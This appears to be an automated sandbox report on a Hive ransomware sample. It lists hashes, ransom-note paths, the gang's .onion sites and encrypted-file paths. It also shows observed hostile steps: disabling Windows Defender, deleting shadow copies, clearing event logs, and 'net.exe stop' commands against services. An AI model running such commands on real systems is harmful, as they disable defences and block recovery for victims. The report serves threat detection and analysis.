Analysis
-
max time kernel
142s -
max time network
123s -
platform
windows7_x64 -
resource
win7-en-20211014 -
submitted
22/11/2021, 11:37
Static task
static1
Behavioral task
behavioral1
Sample
400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe
Resource
win10-en-20211014
General
-
Target
400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe
-
Size
3.4MB
-
MD5
748281385a89ef70a5edfd92524d4352
-
SHA1
133e478af4b36359f51e3d4e5de58401fb8ec179
-
SHA256
400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278
-
SHA512
9086f75237f1acfa6dc62243af54bf888d9c69ed9f53d91f2af25c229499279e25691cf4c58e5b03d0feb74618719fd94411d8bc78e81bb4daa0a0d853befcba
Malware Config
Extracted
C:\XN5k_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 1200 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1344 bcdedit.exe 928 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\7-Zip\Lang\lt.txt.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__5NN71bJT4Mo0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\offset_window.html.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__YckIb8GIf2Q0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099193.GIF.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__s2b3Ao-YkGg0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD10308_.GIF.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__Olf34L51vE80.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\STRTEDGE\XN5k_HOW_TO_DECRYPT.txt 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-api.xml.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__8flten1U-yk0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\MSTAG.TLB.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__bW0jCLeUs_M0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0240157.WMF.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__cx_qmSzXOP80.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_OliveGreen.gif.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__XZN8erqf9BY0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0153508.WMF.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__xcIH_pa_kw00.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0185800.WMF.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__3Um9ehhqvjE0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Interface.zip.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__qnD0L_dqjI00.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Americana\TAB_ON.GIF.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__sm5rF7iE0oM0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR20F.GIF.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__4gf7MLItF8c0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\LoginDialogBackground.jpg.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__4-XytQsn1aQ0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN089.XML.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__c-WPQRw_VTU0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_double_orange.png 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\reveal_hov.png 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Bangkok.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__tOY-KuLDCbE0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__cd6RISmzbYs0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00563_.WMF.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__sSE_r_ve3tE0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02753U.BMP.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__i8IqVFeeFAY0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TN00095_.WMF.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__MFHeRJ-TXOU0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\DELETE.GIF.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__epLVGNWNChU0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ext_5.5.0.165303.jar.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__q05Jdy9MIUA0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\Windows Media Player\de-DE\WMPDMCCore.dll.mui 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8___hPOUIkUfEc0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0182902.WMF.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__-3Y9JkSIXAk0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\LAUNCH.GIF.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__5Cb-MEdwjso0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Small_News.jpg 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\vlc.mo.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__fR27so_B3iM0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Common Files\System\ado\en-US\msader15.dll.mui 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00195_.WMF.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__-t4hvRserWA0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\alertIcon.png 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\Common Files\System\msadc\adcjavas.inc 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\Microsoft Games\More Games\ja-JP\MoreGames.dll.mui.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__7PhSesXkB8U0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\main.css.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__jrerB5ydESg0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\DataMatrix.pmp.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__WMzu53iPDCo0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\Discussion.gta.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__JSC2BBJBwfQ0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\NAVBARV.POC.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__Q9K8pJck7MM0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_choosecolor.gif.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__zTP0G2ZlSqI0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dushanbe.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__wr-VaLeoqYk0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099146.WMF.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__BSHacIWyCU00.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187861.WMF.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__H69gKNILllQ0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287643.JPG.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__b54fjJltwMQ0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE03731_.WMF.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__0lTZirQx1fQ0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02742G.GIF.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__eqx-YB4VZhE0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ipsnor.xml 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\weather.html 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\XN5k_HOW_TO_DECRYPT.txt 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Algiers.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__xW25DlWa8hg0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Karachi.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__rIlE2gtuEUo0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macHandle.png.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__oP1_jbu_rIc0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\twitch.luac.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__vvvy7CoXOiM0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\de-DE\gadget.xml 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\reveal_down.png 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\BORDERS\MSART15.BDR.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__FvhsMIPcupM0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH02166_.WMF.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__e-0tMLGm7vo0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_right_disable.gif.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__7LOfAlh5utU0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Beirut.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__2yxmxYfQuAc0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\EST5EDT.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__CmyBrc-Umfo0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPOlive.png.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__vsOflzMK9F40.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Lagos.PCiXymwGeDszm9IXjBvg308beD1AYVy8-pCXo2Bkb8__1_uJgl09srU0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1964 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1676 powershell.exe 2136 powershell.exe 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 624 wevtutil.exe Token: SeBackupPrivilege 624 wevtutil.exe Token: SeSecurityPrivilege 1068 wevtutil.exe Token: SeBackupPrivilege 1068 wevtutil.exe Token: SeSecurityPrivilege 336 wevtutil.exe Token: SeBackupPrivilege 336 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1636 wmic.exe Token: SeSecurityPrivilege 1636 wmic.exe Token: SeTakeOwnershipPrivilege 1636 wmic.exe Token: SeLoadDriverPrivilege 1636 wmic.exe Token: SeSystemProfilePrivilege 1636 wmic.exe Token: SeSystemtimePrivilege 1636 wmic.exe Token: SeProfSingleProcessPrivilege 1636 wmic.exe Token: SeIncBasePriorityPrivilege 1636 wmic.exe Token: SeCreatePagefilePrivilege 1636 wmic.exe Token: SeBackupPrivilege 1636 wmic.exe Token: SeRestorePrivilege 1636 wmic.exe Token: SeShutdownPrivilege 1636 wmic.exe Token: SeDebugPrivilege 1636 wmic.exe Token: SeSystemEnvironmentPrivilege 1636 wmic.exe Token: SeRemoteShutdownPrivilege 1636 wmic.exe Token: SeUndockPrivilege 1636 wmic.exe Token: SeManageVolumePrivilege 1636 wmic.exe Token: 33 1636 wmic.exe Token: 34 1636 wmic.exe Token: 35 1636 wmic.exe Token: SeIncreaseQuotaPrivilege 1280 wmic.exe Token: SeSecurityPrivilege 1280 wmic.exe Token: SeTakeOwnershipPrivilege 1280 wmic.exe Token: SeLoadDriverPrivilege 1280 wmic.exe Token: SeSystemProfilePrivilege 1280 wmic.exe Token: SeSystemtimePrivilege 1280 wmic.exe Token: SeProfSingleProcessPrivilege 1280 wmic.exe Token: SeIncBasePriorityPrivilege 1280 wmic.exe Token: SeCreatePagefilePrivilege 1280 wmic.exe Token: SeBackupPrivilege 1280 wmic.exe Token: SeRestorePrivilege 1280 wmic.exe Token: SeShutdownPrivilege 1280 wmic.exe Token: SeDebugPrivilege 1280 wmic.exe Token: SeSystemEnvironmentPrivilege 1280 wmic.exe Token: SeRemoteShutdownPrivilege 1280 wmic.exe Token: SeUndockPrivilege 1280 wmic.exe Token: SeManageVolumePrivilege 1280 wmic.exe Token: 33 1280 wmic.exe Token: 34 1280 wmic.exe Token: 35 1280 wmic.exe Token: SeIncreaseQuotaPrivilege 1280 wmic.exe Token: SeSecurityPrivilege 1280 wmic.exe Token: SeTakeOwnershipPrivilege 1280 wmic.exe Token: SeLoadDriverPrivilege 1280 wmic.exe Token: SeSystemProfilePrivilege 1280 wmic.exe Token: SeSystemtimePrivilege 1280 wmic.exe Token: SeProfSingleProcessPrivilege 1280 wmic.exe Token: SeIncBasePriorityPrivilege 1280 wmic.exe Token: SeCreatePagefilePrivilege 1280 wmic.exe Token: SeBackupPrivilege 1280 wmic.exe Token: SeRestorePrivilege 1280 wmic.exe Token: SeShutdownPrivilege 1280 wmic.exe Token: SeDebugPrivilege 1280 wmic.exe Token: SeSystemEnvironmentPrivilege 1280 wmic.exe Token: SeRemoteShutdownPrivilege 1280 wmic.exe Token: SeUndockPrivilege 1280 wmic.exe Token: SeManageVolumePrivilege 1280 wmic.exe Token: 33 1280 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 660 wrote to memory of 1504 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 29 PID 660 wrote to memory of 1504 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 29 PID 660 wrote to memory of 1504 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 29 PID 1504 wrote to memory of 1484 1504 net.exe 31 PID 1504 wrote to memory of 1484 1504 net.exe 31 PID 1504 wrote to memory of 1484 1504 net.exe 31 PID 660 wrote to memory of 616 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 32 PID 660 wrote to memory of 616 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 32 PID 660 wrote to memory of 616 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 32 PID 616 wrote to memory of 1764 616 net.exe 34 PID 616 wrote to memory of 1764 616 net.exe 34 PID 616 wrote to memory of 1764 616 net.exe 34 PID 660 wrote to memory of 1316 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 35 PID 660 wrote to memory of 1316 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 35 PID 660 wrote to memory of 1316 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 35 PID 1316 wrote to memory of 820 1316 net.exe 37 PID 1316 wrote to memory of 820 1316 net.exe 37 PID 1316 wrote to memory of 820 1316 net.exe 37 PID 660 wrote to memory of 428 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 38 PID 660 wrote to memory of 428 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 38 PID 660 wrote to memory of 428 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 38 PID 428 wrote to memory of 1912 428 net.exe 40 PID 428 wrote to memory of 1912 428 net.exe 40 PID 428 wrote to memory of 1912 428 net.exe 40 PID 660 wrote to memory of 1520 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 41 PID 660 wrote to memory of 1520 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 41 PID 660 wrote to memory of 1520 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 41 PID 1520 wrote to memory of 852 1520 net.exe 43 PID 1520 wrote to memory of 852 1520 net.exe 43 PID 1520 wrote to memory of 852 1520 net.exe 43 PID 660 wrote to memory of 1456 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 44 PID 660 wrote to memory of 1456 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 44 PID 660 wrote to memory of 1456 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 44 PID 1456 wrote to memory of 1960 1456 net.exe 46 PID 1456 wrote to memory of 1960 1456 net.exe 46 PID 1456 wrote to memory of 1960 1456 net.exe 46 PID 660 wrote to memory of 1668 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 47 PID 660 wrote to memory of 1668 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 47 PID 660 wrote to memory of 1668 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 47 PID 1668 wrote to memory of 1348 1668 net.exe 49 PID 1668 wrote to memory of 1348 1668 net.exe 49 PID 1668 wrote to memory of 1348 1668 net.exe 49 PID 660 wrote to memory of 988 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 50 PID 660 wrote to memory of 988 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 50 PID 660 wrote to memory of 988 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 50 PID 988 wrote to memory of 1556 988 net.exe 52 PID 988 wrote to memory of 1556 988 net.exe 52 PID 988 wrote to memory of 1556 988 net.exe 52 PID 660 wrote to memory of 1744 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 53 PID 660 wrote to memory of 1744 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 53 PID 660 wrote to memory of 1744 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 53 PID 660 wrote to memory of 1748 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 55 PID 660 wrote to memory of 1748 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 55 PID 660 wrote to memory of 1748 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 55 PID 660 wrote to memory of 1152 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 57 PID 660 wrote to memory of 1152 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 57 PID 660 wrote to memory of 1152 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 57 PID 660 wrote to memory of 1216 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 59 PID 660 wrote to memory of 1216 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 59 PID 660 wrote to memory of 1216 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 59 PID 660 wrote to memory of 1060 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 61 PID 660 wrote to memory of 1060 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 61 PID 660 wrote to memory of 1060 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 61 PID 660 wrote to memory of 904 660 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 63
Processes
-
C:\Users\Admin\AppData\Local\Temp\400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe"C:\Users\Admin\AppData\Local\Temp\400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:660 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1504 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:1484
-
-
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:616 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:1764
